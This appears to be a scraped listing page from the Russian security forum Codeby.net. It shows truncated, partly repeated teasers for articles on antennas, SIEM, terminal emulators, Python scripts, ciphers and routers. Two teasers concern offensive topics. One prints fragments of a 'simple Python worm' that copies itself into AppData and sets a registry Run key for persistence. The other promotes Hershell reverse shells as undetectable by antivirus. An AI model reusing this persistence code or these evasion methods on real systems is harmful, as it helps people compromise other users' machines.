Форум информационной безопасности - Codeby.net
Статья Антенны и антенно-фидерное хозяйство -1
Доброго здравия коллеги!
На форуме много качественного и исчерпывающего материала по всем направлениям IT сферы. Но есть обойдённая вниманием тема: Антенны и антенно-фидерное хозяйство.
Можно конечно сказать: - Нафига нам влазить в эти дебри? Поставил крутую и дорогую антенну и она пробьёт до любой Wi-Fi точки. Если не знать как правильно работает эта «крутая» антенна и как правильно ей пользоваться, никуда она не добьёт, а будет греть лишь воздух вокруг себя. Ибо в Wi-Fi применяется частота от 2,4 Ггц до 2,5 Ггц, а в СВЧ-печах (микроволновках) — 2,45Ггц.
Но хочу я, всё же, начать не с антенн, а с небольшой теории распространения радиоволн.
Я не стану расписывать здесь расчёты формул электродинамики Максвелла или о работах Фарадея над открытием электромагнитных волн. А хочу напомнить лишь что такое радиоволны.
Радиоволна — это электромагнитные волны, распространяемые в окружающем пространстве. К радиоволнам относятся электромагнитные волны с частотами от 3 гц до 3000 Ггц. Все электромагнитные волны вне этого диапазона относятся к другим видам волн (инфракрасные, видимый свет, ультрафиолет, ретгеновские, гамма).
...
На форуме много качественного и исчерпывающего материала по всем направлениям IT сферы. Но есть обойдённая вниманием тема: Антенны и антенно-фидерное хозяйство.
Можно конечно сказать: - Нафига нам влазить в эти дебри? Поставил крутую и дорогую антенну и она пробьёт до любой Wi-Fi точки. Если не знать как правильно работает эта «крутая» антенна и как правильно ей пользоваться, никуда она не добьёт, а будет греть лишь воздух вокруг себя. Ибо в Wi-Fi применяется частота от 2,4 Ггц до 2,5 Ггц, а в СВЧ-печах (микроволновках) — 2,45Ггц.
Но хочу я, всё же, начать не с антенн, а с небольшой теории распространения радиоволн.
Я не стану расписывать здесь расчёты формул электродинамики Максвелла или о работах Фарадея над открытием электромагнитных волн. А хочу напомнить лишь что такое радиоволны.
Радиоволна — это электромагнитные волны, распространяемые в окружающем пространстве. К радиоволнам относятся электромагнитные волны с частотами от 3 гц до 3000 Ггц. Все электромагнитные волны вне этого диапазона относятся к другим видам волн (инфракрасные, видимый свет, ультрафиолет, ретгеновские, гамма).
Статья Управление информацией по вопросам безопасности и менеджмент событий безопасности (Security Information and Event Management (SIEM))
Продукты программного обеспечения и службы SIEM объединяют Управление информацией по вопросам безопасности (security information management (SIM)) и менеджмент событий безопасности ((security event management)SEM). Они предоставляют анализ предупреждений о безопасности в режиме реального времени, создаваемых сетевым оборудованием и приложениями.
Поставщики продают SIEM в качестве программного обеспечения, в качестве устройств или в качестве управляемых служб; эти продукты также используются для регистрации данных безопасности и создания отчетов в целях согласования.
Несмотря на то, что индустрия решила использовать термин ‘SIEM’ в качестве всеобъемлющего термина для этого типа программного обеспечения безопасности, он развился из нескольких различных (но дополнительных) технологий, которые были до него.
Поставщики продают SIEM в качестве программного обеспечения, в качестве устройств или в качестве управляемых служб; эти продукты также используются для регистрации данных безопасности и создания отчетов в целях согласования.
Несмотря на то, что индустрия решила использовать термин ‘SIEM’ в качестве всеобъемлющего термина для этого типа программного обеспечения безопасности, он развился из нескольких различных (но дополнительных) технологий, которые были до него.
- LMS“Log Management System”–...
Статья Простой червь на python
Всем доброго времени суток, участники Codeby!
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.
Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.
Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.
В переменной мы установили путь до реестра, дальше добавили значение нашего вируса,
лучше назвать его как-то неприметно, но я во все услышание ознаменовал его 'Virus'.
И устанавливаем путь до...
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.
Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.
Python:
directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)
if not os.path.exists(directory):
os.makedirs(directory)
shutil.copy(__file__, base_file)Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.
Python:
path_to_reestr = OpenKey(HKEY_CURRENT_USER,
r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)
CloseKey(path_to_reestr)В переменной мы установили путь до реестра, дальше добавили значение нашего вируса,
лучше назвать его как-то неприметно, но я во все услышание ознаменовал его 'Virus'.
И устанавливаем путь до...
Лучшие эмуляторы терминала для LInux
Представляю вашему вниманию обзор моих любимых эмуляторов, которые призваны заменить вашу стандартную консоль.
Upterm (ранее Black Screen) — не только эмулятор терминала, но и интерактивная оболочка с открытым исходным кодом и множеством потрясных функций. Это приложение является IDE (интегрированной средой разработки), основанной на Electron и использующей технологии TypeScript и ReactJS. В пользовательском интерфейсе зайдейтсвованы HTML и CSS, что делает сипользование Upterm еще более удобным.
Главная фишка Upterm — функция умного автозаполнения. Окно автозаполнения появляется по мере ввода, предлагая различные варианты окончания команд в выпадающем списке.
В правой части автозаполнения можно обнаружить много полезной информации, например, расширенные значения alias, подробное описание команд, значение предыдущей директории (cd -) и прочее.
Прочие функции:
- Управление шрифтами
- Цветная подсветка синтаксиса
- Поддержка нескольких вкладок на...
Upterm
Upterm (ранее Black Screen) — не только эмулятор терминала, но и интерактивная оболочка с открытым исходным кодом и множеством потрясных функций. Это приложение является IDE (интегрированной средой разработки), основанной на Electron и использующей технологии TypeScript и ReactJS. В пользовательском интерфейсе зайдейтсвованы HTML и CSS, что делает сипользование Upterm еще более удобным.
Главная фишка Upterm — функция умного автозаполнения. Окно автозаполнения появляется по мере ввода, предлагая различные варианты окончания команд в выпадающем списке.
В правой части автозаполнения можно обнаружить много полезной информации, например, расширенные значения alias, подробное описание команд, значение предыдущей директории (cd -) и прочее.
Прочие функции:
- Управление шрифтами
- Цветная подсветка синтаксиса
- Поддержка нескольких вкладок на...
Статья Hershell: Инструмент для удаленного управления системами Windows и Linux
Приветствую гостей и участников Codeby.net. В этой статье поговорим о способах проникновения и получения контроля над удаленными ПК на ОС Linux и Windows.
Наша первоочередная цель – это заполучить надежный shell на нужном хосте, а потом уже думать над повышением привилегий и так далее.
И для ее осуществления я выбрал инструмент под названием Hershell, не громоздкая утилита, удобная в использовании, написанная на Go (Golang).
Он использует TLS для защиты соединений и обеспечивает функцию фиксации отпечатка пальца, открытого ключа сертификата, предотвращая перехват трафика.
Поддерживаемые ОС:
Очевидными плюсами, разработчики Hershell называют, простоту создания обратного шелла, поддержку множества операционных систем, и в отличие от meterpreter, незаметность для AV-решений.
Так, как инструмент написан на Go, мы можем кросс-компилировать исполняемый код для платформы, отличной от той, на которой исполняется сам...
Наша первоочередная цель – это заполучить надежный shell на нужном хосте, а потом уже думать над повышением привилегий и так далее.
И для ее осуществления я выбрал инструмент под названием Hershell, не громоздкая утилита, удобная в использовании, написанная на Go (Golang).
Он использует TLS для защиты соединений и обеспечивает функцию фиксации отпечатка пальца, открытого ключа сертификата, предотвращая перехват трафика.
Поддерживаемые ОС:
- Windows
- Linux
- Mac OS
- FreeBSD и её производные.*
Очевидными плюсами, разработчики Hershell называют, простоту создания обратного шелла, поддержку множества операционных систем, и в отличие от meterpreter, незаметность для AV-решений.
Так, как инструмент написан на Go, мы можем кросс-компилировать исполняемый код для платформы, отличной от той, на которой исполняется сам...
Пишем простой менеджер загрузок
Приветствую всех, эта рубрика моих никому не нужных разработок. И сегодня мы с вами будем писать простой менеджер загрузок или сценарий для загрузки больше кол-ва файлов. Попробую объяснить для чего это. Представьте что у вас есть ссылки на загрузку музыки(их очень много), вы же не будете переходить по каждой ссылке и скачивать? Мы автоматизируем этот процесс. В файле будут ссылки на скачку, а сценарий скачает их за нас.
!Пишу на python3!
Идея статьи в том, чтобы улучшить знания python читателя(возможно он откроет для себя что-то новое).
Вот такие либы я буду юзать для реализации того, что я хочу.
Введем списки для работы:
Теперь реализуем чтение ссылок из файла:
Теперь напишем загрузку файлов:
!Пишу на python3!
Идея статьи в том, чтобы улучшить знания python читателя(возможно он откроет для себя что-то новое).
Вот такие либы я буду юзать для реализации того, что я хочу.
Код:
import requests
import random
import glob
import os
import shutilВведем списки для работы:
Код:
site = []
files = []Теперь реализуем чтение ссылок из файла:
Код:
handle = open('sites.txt') # Читаем файл
for x in handle: #Записуем содержимое файла в список
site.append(x)
site = map(lambda s: s.strip(), site) # Удаляем из списка \n
site = list(site) # Конвертим в тип list(список)Теперь напишем загрузку файлов:
Код:
for x in site:
if x == '': # Если будет пустой элемент пропустить
continue
ran = random.randint(1,999999) # Рандомное...Статья Создаём уникальный шифр на Python
Сегодня речь пойдёт о шифровании. Если есть необходимость сохранить конфиденциальность информации в текстовых документах даже при их утечке в лапы кулцхакеров, то лучшим выходом будет шифровка.
В сети есть множество программ для этого дела, да вот беда – всё что шифруется, так же замечательно и дешифруется, ведь инструменты то в паблике. Конечно понадобятся какие-то усилия на поиск подходящей тулзы, но это не займёт слишком долго по времени.
Самый верный выход – это написать свой собственный encoder с уникальным кодом, не похожим на другие.
Приступим:
Сначала накидаем обычного Цезаря, но мы ведь русские, а значит нам понадобятся как латиница, так и кириллица. Буквы большие и маленькие -
Но это слишком просто, ничего уникального. А теперь мы «посолим»...
В сети есть множество программ для этого дела, да вот беда – всё что шифруется, так же замечательно и дешифруется, ведь инструменты то в паблике. Конечно понадобятся какие-то усилия на поиск подходящей тулзы, но это не займёт слишком долго по времени.
Самый верный выход – это написать свой собственный encoder с уникальным кодом, не похожим на другие.
Приступим:
Сначала накидаем обычного Цезаря, но мы ведь русские, а значит нам понадобятся как латиница, так и кириллица. Буквы большие и маленькие -
Python:
# -*- coding:utf -8 -*-
# !/usr/bin/python3
# encoder
list_encoder = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЫЬЪЭЮЯабвгдеёжзийклмнопрстуфхцчшщыьъэюяABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
n = int(input('Введите число: '+'\n'))
s = input('Введите текст: '+'\n')
encoder = ''
for c in s:
encoder += list_encoder[(list_encoder.index(c) + n) % len(list_encoder)]
print(encoder)Но это слишком просто, ничего уникального. А теперь мы «посолим»...
Статья Анонимная розетка в твоем доме
Внимание!!! данный материал посвящается тем кто еще хочет купить некоторое устройство-роутер подключившись к которому вы вливаетесь в пространство анонимного интернета !
Но только цена предложенного мной устройства от 2$ до 12$, а возможностей во много раз больше.
И я вам его продавать не собираюсь. Купите в любом компьютерном магазине или на aliexpress
В своих статьях я много описывал. как создать изолированную OS на виртуальных машинах Vmware, Virtualbox.
Некоторые Видео метериаялы по данной тематике представлены ниже !!!
Double SSH Tunnel Manager подключаем Socks5 к Virtualbox через сетевой мост
Double SSH Tunnel Manager подключаем SSH tunnel к Virtualbox через сетевой мост
Double SSH Tunnel Manager подключаем Socks5 к VmWare через сетевой мост...
Статья Железная шкатулка №1: Обзор китайских роутеров GL.iNet
Однажды, рыская по cети в поисках идеального роутера, я наткнулся на китайских мастеров из компании GL.iNet, которые, следуя принципам открытости ПО и DIY, оснащают свои устройства довольно обширными возможностями для модификации и экспериментов с прошивкой OpenWrt. Далее проведу краткий обзор роутеров, которые меня заинтересовали.
GL.iNet GL-AR300M
Самая новая модель "компактной" серии (39 г, 58x58x25 мм) роутеров GL.iNet. Выпущена в начале 2017 года. Лично я склонился именно к этому решению, так как никаких специфических предпочтений, вроде наличия 4GPIO и прочего, у меня нет.
- Процессор Qualcomm Atheros QCA9531 SoC, 650 МГц
- Cкорость соединения до 300 Мбит/с
- Стандарты связи: 802.11 b/g/n
- ОЗУ: 128 Мб DDR2 от EtronTech
- Флэш-память: 16 Мб (Nor) от Winbond + 128 Мб (Nand) от GigaDevice в стандартной и расширенной версиях
- Интерфейсы: WAN, LAN, USB 2.0, micro-USB (питание), PCIe, UART, GPIO
- Дополнительные выходы питания на плате: 5V и 3.3V
- Можно установить 2 внешние антенны разной мощности вплоть до 20dB в сумме...
Самая новая модель "компактной" серии (39 г, 58x58x25 мм) роутеров GL.iNet. Выпущена в начале 2017 года. Лично я склонился именно к этому решению, так как никаких специфических предпочтений, вроде наличия 4GPIO и прочего, у меня нет.
- Процессор Qualcomm Atheros QCA9531 SoC, 650 МГц
- Cкорость соединения до 300 Мбит/с
- Стандарты связи: 802.11 b/g/n
- ОЗУ: 128 Мб DDR2 от EtronTech
- Флэш-память: 16 Мб (Nor) от Winbond + 128 Мб (Nand) от GigaDevice в стандартной и расширенной версиях
- Интерфейсы: WAN, LAN, USB 2.0, micro-USB (питание), PCIe, UART, GPIO
- Дополнительные выходы питания на плате: 5V и 3.3V
- Можно установить 2 внешние антенны разной мощности вплоть до 20dB в сумме...
Статья Firework: Анализ Безопасности RDP и Методы Защиты
Добрый день , Друзья,Уважаемые Форумчане и те , кто следит за пульсом ИБ.
О чём мы будем с вами сегодня говорить : о банальной эксплуатации дедика и новом инструменте Firework. Этот инструмент нам помогает разнообразить атаки на удалённые рабочие столы Windows. У нас с вами был и так перерывчик , который разбавили моим нетрезвым присутствием и примитивным моим же творчеством. Пора и о серьёзных вещах поговорить.
Натолкнуло меня на написание этой статьи общение с девушкой-секретаршей из областной администрации моего города.
Опустим лирику и рассуждения о пустом смысле переписки с администрациями,если это конечно реально не целевая атака))
Речь шла об отправке письма ей на почту мной в виде файла pdf. Я ещё переспросил,не боятся ли они получать файлы в таком формате. На что , мне Чудо томным голоском промурчало,что они внимательно и в скоростном режиме загруженности читают все файлы.. Занавес короче , в общем , звонок-то был деловой конечно , но мысли меня посетили при этом нехорошие и холодок по спине пробежал. При этом вспомнились известные вредоносы pdf. Здешним жителям не надо объяснять ,чем это чревато и насколько...